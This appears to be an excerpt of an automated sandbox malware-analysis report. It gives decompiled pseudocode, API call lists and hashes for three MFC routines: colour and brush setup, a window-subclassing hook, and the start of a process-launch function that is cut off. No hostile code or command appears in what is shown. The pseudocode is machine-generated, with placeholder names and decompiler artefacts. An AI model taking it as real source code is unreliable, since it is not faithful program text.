      Uniqueness Score: -1.00%

      Function 009BF8B8 Relevance: 64.8, APIs: 43, Instructions: 304COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 95%
      			E009BF8B8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t109;
				signed int _t111;
				long _t114;
				long _t115;
				long _t116;
				long _t117;
				long _t118;
				long _t119;
				long _t124;
				long _t135;
				struct HBRUSH__* _t136;
				struct HBRUSH__* _t137;
				struct HBRUSH__* _t139;
				struct HBRUSH__* _t141;
				struct HPEN__* _t162;
				long _t198;
				long _t200;
				signed int _t203;
				signed char _t237;
				void* _t252;
				void* _t257;
				void* _t264;
				void* _t266;
				void* _t268;

				_t245 = __edx;
				_push(0x20);
				E00AAD232(0xac8ecd, __ebx, __edi, __esi);
				_t256 = __ecx;
				_t252 = GetSysColor;
				if(GetSysColor(0x16) != 0xffffff) {
					L3:
					_t109 = 0;
					__eflags = 0;
				} else {
					_t200 = GetSysColor(0xf);
					if(_t200 != 0) {
						goto L3;
					} else {
						_t109 = _t200 + 1;
					}
				}
				 *((intOrPtr*)(_t256 + 0x184)) = _t109;
				if(GetSysColor(0x15) != 0) {
					L7:
					_t111 = 0;
					__eflags = 0;
				} else {
					_t198 = GetSysColor(0xf);
					_t262 = _t198 - 0xffffff;
					if(_t198 != 0xffffff) {
						goto L7;
					} else {
						_t111 = 1;
					}
				}
				_t203 = 0;
				_push(0);
				 *((intOrPtr*)(_t256 + 0x188)) = _t111;
				E009BAE6D(0, _t257 - 0x2c, _t245, _t252, _t256, _t262);
				 *(_t257 - 4) = 0;
				 *((intOrPtr*)(_t256 + 0x1ac)) = GetDeviceCaps( *(_t257 - 0x24), 0xc);
				_t114 = GetSysColor(0xf);
				 *(_t256 + 0x14) = _t114;
				 *(_t256 + 0x4c) = _t114;
				_t115 = GetSysColor(0x10);
				 *(_t256 + 0x18) = _t115;
				 *(_t256 + 0x50) = _t115;
				_t116 = GetSysColor(0x15);
				 *(_t256 + 0x28) = _t116;
				 *(_t256 + 0x58) = _t116;
				_t117 = GetSysColor(0x16);
				 *(_t256 + 0x2c) = _t117;
				 *(_t256 + 0x5c) = _t117;
				_t118 = GetSysColor(0x14);
				 *(_t256 + 0x1c) = _t118;
				 *(_t256 + 0x54) = _t118;
				_t119 = GetSysColor(0x12);
				 *(_t256 + 0x20) = _t119;
				 *(_t256 + 0x60) = _t119;
				 *((intOrPtr*)(_t256 + 0x30)) = GetSysColor(0x11);
				 *((intOrPtr*)(_t256 + 0x24)) = GetSysColor(6);
				 *(_t256 + 0x34) = GetSysColor(0xd);
				 *((intOrPtr*)(_t256 + 0x38)) = GetSysColor(0xe);
				_t124 = GetSysColor(5);
				 *(_t256 + 0x64) = _t124;
				 *(_t256 + 0x48) = _t124;
				 *(_t256 + 0x68) = GetSysColor(8);
				 *((intOrPtr*)(_t256 + 0x6c)) = GetSysColor(9);
				 *((intOrPtr*)(_t256 + 0x70)) = GetSysColor(7);
				 *(_t256 + 0x74) = GetSysColor(2);
				 *(_t256 + 0x78) = GetSysColor(3);
				 *((intOrPtr*)(_t256 + 0x80)) = GetSysColor(0x1b);
				 *((intOrPtr*)(_t256 + 0x84)) = GetSysColor(0x1c);
				 *((intOrPtr*)(_t256 + 0x88)) = GetSysColor(0xa);
				 *((intOrPtr*)(_t256 + 0x8c)) = GetSysColor(0xb);
				 *((intOrPtr*)(_t256 + 0x7c)) = GetSysColor(0x13);
				if( *((intOrPtr*)(_t256 + 0x184)) == 0) {
					_t135 = GetSysColor(0x1a);
					 *(_t256 + 0x40) = 0xff0000;
					 *(_t256 + 0x44) = 0x800080;
				} else {
					_t135 =  *(_t256 + 0x68);
					 *(_t256 + 0x40) = _t135;
					 *(_t256 + 0x44) = _t135;
				}
				 *(_t256 + 0x3c) = _t135;
				_t136 = GetSysColorBrush(0x10);
				_t264 = _t136 - _t203;
				_t208 = 0 | _t264 != 0x00000000;
				 *(_t256 + 0xc) = _t136;
				if(_t264 != 0 == _t203) {
					L12:
					E009B8782(_t208);
				}
				_t137 = GetSysColorBrush(0x14);
				_t266 = _t137 - _t203;
				_t208 = 0 | _t266 != 0x00000000;
				 *(_t256 + 8) = _t137;
				if(_t266 != 0 == _t203) {
					goto L12;
				}
				_t139 = GetSysColorBrush(5);
				_t268 = _t139 - _t203;
				_t208 = 0 | _t268 != 0x00000000;
				 *(_t256 + 0x10) = _t139;
				if(_t268 != 0 == _t203) {
					goto L12;
				}
				E009BB072(_t256 + 0x90);
				_t254 = CreateSolidBrush; // executed
				_t141 = CreateSolidBrush( *(_t256 + 0x14)); // executed
				E009BB018(_t203, _t256 + 0x90, _t245, CreateSolidBrush, _t141);
				E009BB072(_t256 + 0xc8);
				E009BB018(_t203, _t256 + 0xc8, _t245, CreateSolidBrush, CreateSolidBrush( *(_t256 + 0x4c)));
				E009BB072(_t256 + 0xb0);
				E009BB018(_t203, _t256 + 0xb0, _t245, _t254, CreateSolidBrush( *(_t256 + 0x74)));
				E009BB072(_t256 + 0xb8);
				E009BB018(_t203, _t256 + 0xb8, _t245, _t254, CreateSolidBrush( *(_t256 + 0x78)));
				E009BB072(_t256 + 0x98);
				E009BB018(_t203, _t256 + 0x98, _t245, _t254, CreateSolidBrush( *(_t256 + 0x34)));
				E009BB072(_t256 + 0xa8);
				E009BB018(_t203, _t256 + 0xa8, _t245, _t254, CreateSolidBrush( *(_t256 + 0x28)));
				E009BB072(_t256 + 0xc0);
				E009BB018(_t203, _t256 + 0xc0, _t245, _t254, CreateSolidBrush( *(_t256 + 0x64)));
				E009BB072(_t256 + 0xd0);
				_t204 = CreatePen;
				_t162 = CreatePen(0, 1,  *0xd0fde4); // executed
				E009BB018(CreatePen, _t256 + 0xd0, _t245, _t254, _t162);
				E009BB072(_t256 + 0xd8);
				E009BB018(CreatePen, _t256 + 0xd8, _t245, _t254, CreatePen(0, 1,  *0xd0fdfc));
				E009BB072(_t256 + 0xe0);
				E009BB018(_t204, _t256 + 0xe0, _t245, _t254, CreatePen(0, 1,  *0xd0fe00));
				_t203 = _t256 + 0xa0;
				if(_t203 != 0 &&  *((intOrPtr*)(_t203 + 4)) != 0) {
					E009BB072(_t203);
				}
				if( *((intOrPtr*)(_t256 + 0x1ac)) <= 8) {
					__eflags = E009BE955(_t203,  *((intOrPtr*)(_t257 - 0x28)));
					_t208 = 0 | __eflags != 0x00000000;
					if(__eflags == 0) {
						goto L12;
					} else {
						_t94 = _t257 - 0x14;
						 *_t94 =  *(_t257 - 0x14) & 0x00000000;
						__eflags =  *_t94;
						_t256 = 0xad7e64;
						 *((intOrPtr*)(_t257 - 0x18)) = 0xad7e64;
						 *(_t257 - 4) = 1;
						E009BB018(_t203, _t257 - 0x18, _t245, _t254, _t170);
						E009BB018(_t203, _t203, _t245, _t254, CreatePatternBrush( *(_t257 - 0x14)));
						 *(_t257 - 4) = 0;
						 *((intOrPtr*)(_t257 - 0x18)) = 0xad7e64;
						E009A93B2(_t203, _t257 - 0x18, _t254, 0xad7e64, __eflags);
					}
				} else {
					_t237 =  *((intOrPtr*)(_t256 + 0x16));
					 *(_t257 - 0xd) =  *(_t256 + 0x14);
					_t246 = _t237 & 0x000000ff;
					asm("cdq");
					_t247 =  *(_t256 + 0x15) & 0x000000ff;
					asm("cdq");
					_t245 =  *(_t257 - 0xd) & 0x000000ff;
					asm("cdq");
					E009BB018(_t203, _t203, _t245, _t254, CreateSolidBrush((((( *(_t256 + 0x1e) & 0x000000ff) - (_t237 & 0x000000ff) - _t246 >> 0x00000001) + _t237 & 0x000000ff) << 0x00000008 | (( *(_t256 + 0x1d) & 0x000000ff) - ( *(_t256 + 0x15) & 0x000000ff) - _t247 >> 0x00000001) + ( *(_t256 + 0x15) & 0x000000ff) & 0x000000ff) << 0x00000008 | (( *(_t256 + 0x1c) & 0x000000ff) - ( *(_t257 - 0xd) & 0x000000ff) - _t245 >> 0x00000001) +  *(_t257 - 0xd) & 0x000000ff));
				}
				E009EE504();
				_t103 = _t257 - 4;
				 *(_t257 - 4) =  *(_t257 - 4) | 0xffffffff;
				 *0xd1160c = 1;
				return E00AAD30A(E009BAEC1(_t203, _t257 - 0x2c, _t245, _t254, _t256,  *_t103));
			}



























      0x009bf8b8
      0x009bf8b8
      0x009bf8bf
      0x009bf8c4
      0x009bf8c6
      0x009bf8d7
      0x009bf8e4
      0x009bf8e4
      0x009bf8e4
      0x009bf8d9
      0x009bf8db
      0x009bf8df
      0x00000000
      0x009bf8e1
      0x009bf8e1
      0x009bf8e1
      0x009bf8df
      0x009bf8e8
      0x009bf8f2
      0x009bf901
      0x009bf901
      0x009bf901
      0x009bf8f4
      0x009bf8f6
      0x009bf8f8
      0x009bf8fa
      0x00000000
      0x009bf8fc
      0x009bf8fe
      0x009bf8fe
      0x009bf8fa
      0x009bf903
      0x009bf905
      0x009bf909
      0x009bf90f
      0x009bf919
      0x009bf924
      0x009bf92a
      0x009bf92e
      0x009bf931
      0x009bf934
      0x009bf938
      0x009bf93b
      0x009bf93e
      0x009bf942
      0x009bf945
      0x009bf948
      0x009bf94c
      0x009bf94f
      0x009bf952
      0x009bf956
      0x009bf959
      0x009bf95c
      0x009bf960
      0x009bf963
      0x009bf96a
      0x009bf971
      0x009bf978
      0x009bf97f
      0x009bf982
      0x009bf986
      0x009bf989
      0x009bf990
      0x009bf997
      0x009bf99e
      0x009bf9a5
      0x009bf9ac
      0x009bf9b3
      0x009bf9bd
      0x009bf9c7
      0x009bf9d1
      0x009bf9d9
      0x009bf9e2
      0x009bf9f1
      0x009bf9f3
      0x009bf9fa
      0x009bf9e4
      0x009bf9e4
      0x009bf9e7
      0x009bf9ea
      0x009bf9ea
      0x009bfa09
      0x009bfa0c
      0x009bfa10
      0x009bfa12
      0x009bfa15
      0x009bfa1a
      0x009bfa1c
      0x009bfa1c
      0x009bfa1c
      0x009bfa23
      0x009bfa27
      0x009bfa29
      0x009bfa2c
      0x009bfa31
      0x00000000
      0x00000000
      0x009bfa35
      0x009bfa39
      0x009bfa3b
      0x009bfa3e
      0x009bfa43
      0x00000000
      0x00000000
      0x009bfa4b
      0x009bfa53
      0x009bfa59
      0x009bfa62
      0x009bfa6d
      0x009bfa7e
      0x009bfa89
      0x009bfa9a
      0x009bfaa5
      0x009bfab6
      0x009bfac1
      0x009bfad2
      0x009bfadd
      0x009bfaee
      0x009bfaf9
      0x009bfb0a
      0x009bfb15
      0x009bfb20
      0x009bfb2a
      0x009bfb33
      0x009bfb3e
      0x009bfb56
      0x009bfb61
      0x009bfb79
      0x009bfb7e
      0x009bfb86
      0x009bfb90
      0x009bfb90
      0x009bfb9c
      0x009bfc0c
      0x009bfc0e
      0x009bfc13
      0x00000000
      0x009bfc19
      0x009bfc19
      0x009bfc19
      0x009bfc19
      0x009bfc1d
      0x009bfc22
      0x009bfc29
      0x009bfc2d
      0x009bfc3e
      0x009bfc46
      0x009bfc4a
      0x009bfc4d
      0x009bfc4d
      0x009bfb9e
      0x009bfb9e
      0x009bfba4
      0x009bfbab
      0x009bfbb0
      0x009bfbb3
      0x009bfbc4
      0x009bfbd4
      0x009bfbe3
      0x009bfbf9
      0x009bfbf9
      0x009bfc52
      0x009bfc57
      0x009bfc57
      0x009bfc5e
      0x009bfc72

      APIs
      • __EH_prolog3.LIBCMT ref: 009BF8BF
      • GetSysColor.USER32(00000016), ref: 009BF8CE
      • GetSysColor.USER32(0000000F), ref: 009BF8DB
      • GetSysColor.USER32(00000015), ref: 009BF8EE
      • GetSysColor.USER32(0000000F), ref: 009BF8F6
      • GetDeviceCaps.GDI32(?,0000000C), ref: 009BF91C
      • GetSysColor.USER32(0000000F), ref: 009BF92A
      • GetSysColor.USER32(00000010), ref: 009BF934
      • GetSysColor.USER32(00000015), ref: 009BF93E
      • GetSysColor.USER32(00000016), ref: 009BF948
      • GetSysColor.USER32(00000014), ref: 009BF952
      • GetSysColor.USER32(00000012), ref: 009BF95C
      • GetSysColor.USER32(00000011), ref: 009BF966
      • GetSysColor.USER32(00000006), ref: 009BF96D
      • GetSysColor.USER32(0000000D), ref: 009BF974
      • GetSysColor.USER32(0000000E), ref: 009BF97B
      • GetSysColor.USER32(00000005), ref: 009BF982
      • GetSysColor.USER32(00000008), ref: 009BF98C
      • GetSysColor.USER32(00000009), ref: 009BF993
      • GetSysColor.USER32(00000007), ref: 009BF99A
      • GetSysColor.USER32(00000002), ref: 009BF9A1
      • GetSysColor.USER32(00000003), ref: 009BF9A8
      • GetSysColor.USER32(0000001B), ref: 009BF9AF
      • GetSysColor.USER32(0000001C), ref: 009BF9B9
      • GetSysColor.USER32(0000000A), ref: 009BF9C3
      • GetSysColor.USER32(0000000B), ref: 009BF9CD
      • GetSysColor.USER32(00000013), ref: 009BF9D7
      • GetSysColor.USER32(0000001A), ref: 009BF9F1
      • GetSysColorBrush.USER32(00000010), ref: 009BFA0C
      • GetSysColorBrush.USER32(00000014), ref: 009BFA23
      • GetSysColorBrush.USER32(00000005), ref: 009BFA35
      • CreateSolidBrush.GDI32(?), ref: 009BFA59
      • CreateSolidBrush.GDI32(?), ref: 009BFA75
      • CreateSolidBrush.GDI32(?), ref: 009BFA91
      • CreateSolidBrush.GDI32(?), ref: 009BFAAD
      • CreateSolidBrush.GDI32(?), ref: 009BFAC9
      • CreateSolidBrush.GDI32(?), ref: 009BFAE5
      • CreateSolidBrush.GDI32(?), ref: 009BFB01
      • CreatePen.GDI32(00000000,00000001,00000000), ref: 009BFB2A
      • CreatePen.GDI32(00000000,00000001,00000000), ref: 009BFB4D
      • CreatePen.GDI32(00000000,00000001,00000000), ref: 009BFB70
      • CreateSolidBrush.GDI32(?), ref: 009BFBF4
      • CreatePatternBrush.GDI32(00000000), ref: 009BFC35
        • Part of subcall function 009BB072: DeleteObject.GDI32(00000000), ref: 009BB081
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
      • String ID:
      • API String ID: 3754413814-0
      • Opcode ID: c974948d1f8398607ed65cdd9d9b770009c8103d4669c6ca8ceb0350ba922163
      • Instruction ID: f2dd04c47b048aad94ccee4065eedaa2dda52ae3c4fca705bb37954dfd378be2
      • Opcode Fuzzy Hash: c974948d1f8398607ed65cdd9d9b770009c8103d4669c6ca8ceb0350ba922163
      • Instruction Fuzzy Hash: 80B17A70900B449ADB34BF71CD55BEBBBE0AF81710F00892EE19B865D1EBB5A948DF50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AEAF8 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 176COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 116 9aeaf8-9aeb31 call aad29b call 9bcdbd 121 9aeb38-9aeb3c 116->121 122 9aeb33 call 9b8782 116->122 124 9aeb3e-9aeb4c CallNextHookEx 121->124 125 9aeb51-9aeb67 call 9bd77f 121->125 122->121 126 9aed37-9aed3c call aad31e 124->126 130 9aeb69-9aeb70 125->130 131 9aeb7e-9aeb85 125->131 133 9aeb76-9aeb78 130->133 134 9aed05-9aed26 CallNextHookEx 130->134 135 9aebd2-9aebd4 131->135 136 9aeb87-9aeb95 GetClassLongA 131->136 133->131 133->134 138 9aed28-9aed31 UnhookWindowsHookEx 134->138 139 9aed35 134->139 140 9aec30-9aec38 135->140 141 9aebd6-9aec11 call 9bd7c9 call 9ac958 SetWindowLongA 135->141 136->134 137 9aeb9b-9aeba3 136->137 142 9aebbd-9aebcc call 9ab7f1 137->142 143 9aeba5-9aebba GlobalGetAtomNameA 137->143 138->139 139->126 144 9aec3a-9aec72 call aab3f0 call 9ab523 140->144 145 9aec74-9aec87 GetClassLongA 140->145 167 9aec13 141->167 168 9aec15-9aec2b call 9bcf01 141->168 142->134 142->135 143->142 144->145 162 9aec8b-9aeca0 GetClassNameA 144->162 150 9aecb9-9aecc7 GetWindowLongA 145->150 151 9aec89 145->151 150->134 152 9aecc9-9aecda GetPropA 150->152 151->134 152->134 156 9aecdc-9aecee SetPropA GetPropA 152->156 156->134 159 9aecf0-9aecff GlobalAddAtomA SetWindowLongA 156->159 159->134 162->150 163 9aeca2-9aecb7 call aad9bc 162->163 163->134 163->150 167->168 168->134
      C-Code - Quality: 93%
      			E009AEAF8(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t53;
				signed int _t55;
				signed int _t58;
				long _t59;
				signed int _t63;
				void* _t65;
				signed int _t71;
				signed int _t73;
				signed int _t75;
				long _t82;
				signed int _t85;
				signed short _t86;
				signed int _t87;
				int _t93;
				void* _t105;
				void* _t107;
				long* _t109;
				long _t111;
				signed int _t112;
				CHAR* _t113;
				intOrPtr _t114;
				void* _t117;
				void* _t120;
				intOrPtr _t121;

				_t120 = __eflags;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x148);
				E00AAD29B(0xac80b6, __ebx, __edi, __esi);
				_t111 =  *(_t117 + 0x10);
				_t93 =  *(_t117 + 0xc);
				_push(E009AB424);
				 *(_t117 - 0x120) = _t111;
				_t53 = E009BCDBD(_t93, 0xd0fd04, __edi, _t111, _t120);
				_t121 = _t53;
				_t96 = 0 | _t121 == 0x00000000;
				 *((intOrPtr*)(_t117 - 0x11c)) = _t53;
				if(_t121 == 0) {
					_t53 = E009B8782(_t96);
				}
				if( *(_t117 + 8) == 3) {
					_t107 =  *_t111;
					_t112 =  *(_t53 + 0x14);
					_t55 =  *(E009BD77F(_t93, _t107, _t112, __eflags) + 0x14) & 0x000000ff;
					 *(_t117 - 0x124) = _t55;
					__eflags = _t112;
					if(_t112 != 0) {
						L7:
						__eflags =  *0xd101e4;
						if( *0xd101e4 == 0) {
							L12:
							__eflags = _t112;
							if(__eflags == 0) {
								__eflags =  *0xd0fb64;
								if( *0xd0fb64 != 0) {
									L18:
									__eflags = (GetClassLongA(_t93, 0xffffffe0) & 0x0000ffff) -  *0xd0fb64; // 0x8000
									if(__eflags != 0) {
										L22:
										_t58 = GetWindowLongA(_t93, 0xfffffffc);
										 *(_t117 - 0x14) = _t58;
										__eflags = _t58;
										if(_t58 != 0) {
											_t113 = "AfxOldWndProc423";
											_t63 = GetPropA(_t93, _t113);
											__eflags = _t63;
											if(_t63 == 0) {
												SetPropA(_t93, _t113,  *(_t117 - 0x14)); // executed
												_t65 = GetPropA(_t93, _t113);
												__eflags = _t65 -  *(_t117 - 0x14);
												if(_t65 ==  *(_t117 - 0x14)) {
													GlobalAddAtomA(_t113); // executed
													SetWindowLongA(_t93, 0xfffffffc, E009AE991);
												}
											}
										}
										L26:
										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
										_t59 = CallNextHookEx( *(_t106 + 0x28), 3, _t93,  *(_t117 - 0x120));
										__eflags =  *(_t117 - 0x124);
										_t111 = _t59;
										if( *(_t117 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t106 + 0x28));
											_t49 = _t106 + 0x28;
											 *_t49 =  *(_t106 + 0x28) & 0x00000000;
											__eflags =  *_t49;
										}
										goto L29;
									}
									goto L26;
								}
								_t114 = 0x30;
								E00AAB3F0(_t117 - 0x154, 0, _t114);
								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
								_push(_t117 - 0x154);
								_t115 = "#32768";
								_push("#32768");
								_push(0);
								_t71 = E009AB523(_t96, "#32768", __eflags);
								 *0xd0fb64 = _t71;
								__eflags = _t71;
								if(_t71 == 0) {
									_t73 = GetClassNameA(_t93, _t117 - 0x118, 0x100);
									__eflags = _t73;
									if(_t73 == 0) {
										goto L22;
									}
									 *((char*)(_t117 - 0x19)) = 0;
									_t75 = E00AAD9BC(_t117 - 0x118, _t115);
									__eflags = _t75;
									if(_t75 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L18;
							}
							E009BD7C9(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
							E009AC958(_t112, _t105, _t93);
							 *((intOrPtr*)( *_t112 + 0x50))();
							_t109 =  *((intOrPtr*)( *_t112 + 0xfc))();
							_t82 = SetWindowLongA(_t93, 0xfffffffc, E009AD67F);
							__eflags = _t82 - E009AD67F;
							if(_t82 != E009AD67F) {
								 *_t109 = _t82;
							}
							_t83 =  *((intOrPtr*)(_t117 - 0x11c));
							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
							E009BCF01(_t83, _t117 - 0x18);
							goto L26;
						}
						_t85 = GetClassLongA(_t93, 0xffffffe6);
						__eflags = _t85 & 0x00010000;
						if((_t85 & 0x00010000) != 0) {
							goto L26;
						}
						_t86 =  *(_t107 + 0x28);
						__eflags = _t86 - 0xffff;
						if(_t86 <= 0xffff) {
							 *(_t117 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
							_t86 = _t117 - 0x18;
						}
						_t87 = E009AB7F1(_t86, "ime");
						_pop(_t96);
						__eflags = _t87;
						if(_t87 == 0) {
							goto L26;
						} else {
							goto L12;
						}
					}
					__eflags =  *(_t107 + 0x20) & 0x40000000;
					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
						goto L26;
					}
					__eflags = _t55;
					if(_t55 != 0) {
						goto L26;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t53 + 0x28),  *(_t117 + 8), _t93, _t111);
					L29:
					return E00AAD31E(_t93, _t106, _t111);
				}
			}



























      0x009aeaf8
      0x009aeaf8
      0x009aeaf8
      0x009aeaf8
      0x009aeb02
      0x009aeb07
      0x009aeb0a
      0x009aeb0d
      0x009aeb17
      0x009aeb1d
      0x009aeb24
      0x009aeb26
      0x009aeb29
      0x009aeb31
      0x009aeb33
      0x009aeb33
      0x009aeb3c
      0x009aeb51
      0x009aeb53
      0x009aeb5b
      0x009aeb5f
      0x009aeb65
      0x009aeb67
      0x009aeb7e
      0x009aeb7e
      0x009aeb85
      0x009aebd2
      0x009aebd2
      0x009aebd4
      0x009aec30
      0x009aec38
      0x009aec74
      0x009aec80
      0x009aec87
      0x009aecb9
      0x009aecbc
      0x009aecc2
      0x009aecc5
      0x009aecc7
      0x009aeccf
      0x009aecd6
      0x009aecd8
      0x009aecda
      0x009aece1
      0x009aece9
      0x009aeceb
      0x009aecee
      0x009aecf1
      0x009aecff
      0x009aecff
      0x009aecee
      0x009aecda
      0x009aed05
      0x009aed0b
      0x009aed17
      0x009aed1d
      0x009aed24
      0x009aed26
      0x009aed2b
      0x009aed31
      0x009aed31
      0x009aed31
      0x009aed31
      0x00000000
      0x009aed35
      0x00000000
      0x009aec89
      0x009aec3c
      0x009aec47
      0x009aec52
      0x009aec58
      0x009aec59
      0x009aec5e
      0x009aec5f
      0x009aec61
      0x009aec69
      0x009aec6f
      0x009aec72
      0x009aec98
      0x009aec9e
      0x009aeca0
      0x00000000
      0x00000000
      0x009aecaa
      0x009aecae
      0x009aecb5
      0x009aecb7
      0x00000000
      0x00000000
      0x00000000
      0x009aecb7
      0x00000000
      0x009aec72
      0x009aebdc
      0x009aebe1
      0x009aebe8
      0x009aebf1
      0x009aec07
      0x009aec09
      0x009aec0f
      0x009aec11
      0x009aec13
      0x009aec13
      0x009aec15
      0x009aec1b
      0x009aec1f
      0x009aec26
      0x00000000
      0x009aec26
      0x009aeb8a
      0x009aeb90
      0x009aeb95
      0x00000000
      0x00000000
      0x009aeb9b
      0x009aeb9e
      0x009aeba3
      0x009aebb0
      0x009aebb4
      0x009aebba
      0x009aebba
      0x009aebc3
      0x009aebc9
      0x009aebca
      0x009aebcc
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009aebcc
      0x009aeb69
      0x009aeb70
      0x00000000
      0x00000000
      0x009aeb76
      0x009aeb78
      0x00000000
      0x00000000
      0x00000000
      0x009aeb3e
      0x009aeb46
      0x009aed37
      0x009aed3c
      0x009aed3c

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009AEB02
        • Part of subcall function 009BCDBD: __EH_prolog3.LIBCMT ref: 009BCDC4
      • CallNextHookEx.USER32(?,?,?,?), ref: 009AEB46
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      • GetClassLongA.USER32 ref: 009AEB8A
      • GlobalGetAtomNameA.KERNEL32 ref: 009AEBB4
      • SetWindowLongA.USER32 ref: 009AEC09
      • _memset.LIBCMT ref: 009AEC47
        • Part of subcall function 009AB523: ActivateActCtx.KERNEL32(?,?,00B0BA90,00000010), ref: 009AB543
      • GetClassLongA.USER32 ref: 009AEC77
      • GetClassNameA.USER32(?,?,00000100), ref: 009AEC98
      • GetWindowLongA.USER32 ref: 009AECBC
      • GetPropA.USER32 ref: 009AECD6
      • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 009AECE1
      • GetPropA.USER32 ref: 009AECE9
      • GlobalAddAtomA.KERNEL32 ref: 009AECF1
      • SetWindowLongA.USER32 ref: 009AECFF
      • CallNextHookEx.USER32(?,00000003,?,?), ref: 009AED17
      • UnhookWindowsHookEx.USER32(?), ref: 009AED2B
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$ActivateException@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
      • String ID: #32768$AfxOldWndProc423$ime
      • API String ID: 2222608385-4034971020
      • Opcode ID: 8c2b4c5d883666c45e780aa1165c86d4aeb0e513ad6a94a47dba36d3b18d97af
      • Instruction ID: b83ae122627e14389b5089c22fb774b6629b058b28b05d36cee7af71190df64e
      • Opcode Fuzzy Hash: 8c2b4c5d883666c45e780aa1165c86d4aeb0e513ad6a94a47dba36d3b18d97af
      • Instruction Fuzzy Hash: 4B51D07140121AABCB21AF64CD49BEE7BB8EF0A321F150555F406A72D1DB34DD41CBE4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A3DF0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 173stringprocessCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 81%
      			E009A3DF0(intOrPtr* __ecx, void* __eflags, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16) {
				CHAR* _v8;
				char _v16;
				signed int _v20;
				char _v279;
				char _v280;
				char _v539;
				char _v540;
				char _v799;
				char _v800;
				char _v1059;
				char _v1060;
				void _v1168;
				CHAR* _v1172;
				CHAR* _v1176;
				struct _STARTUPINFOA _v1244;
				struct _PROCESS_INFORMATION _v1260;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t54;
				signed int _t55;
				CHAR* _t89;
				void* _t90;
				void* _t94;
				void* _t130;
				void* _t131;
				intOrPtr* _t135;
				void* _t136;
				signed int _t138;
				void* _t139;
				void* _t142;
				void* _t145;

				_t145 = __eflags;
				_push(0xffffffff);
				_push(0xac7b1e);
				_push( *[fs:0x0]);
				_t54 =  *0xd0c910; // 0x3a0e8b0c
				_t55 = _t54 ^ _t138;
				_v20 = _t55;
				_push(_t55);
				 *[fs:0x0] =  &_v16;
				_t135 = __ecx;
				_v1176 = _a8;
				_v1172 = _a12;
				_v540 = 0;
				E00AAB3F0( &_v539, 0, 0x103);
				_v280 = 0;
